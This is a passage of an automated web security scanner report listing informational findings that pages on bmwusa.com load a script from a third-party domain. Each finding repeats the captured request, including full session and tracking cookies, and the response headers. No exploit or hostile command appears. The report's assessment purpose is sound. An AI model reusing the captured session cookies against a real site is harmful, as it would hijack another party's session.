User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:40 GMT;path=/
Content-Length: 213862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.143. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:22 GMT;path=/
Content-Length: 228676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.144. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:14 GMT;path=/
Content-Length: 228677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.145. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:35 GMT;path=/
Content-Length: 214337


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.146. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:59 GMT;path=/
Content-Length: 214338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.147. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:53 GMT;path=/
Content-Length: 202023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.148. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:22 GMT;path=/
Content-Length: 214373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.149. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:58 GMT;path=/
Content-Length: 227791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.150. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:36 GMT;path=/
Content-Length: 215373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.151. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:26 GMT;path=/
Content-Length: 202293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.152. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:20 GMT;path=/
Content-Length: 202294


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.153. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:01 GMT;path=/
Content-Length: 214718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.154. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.155. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.156. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
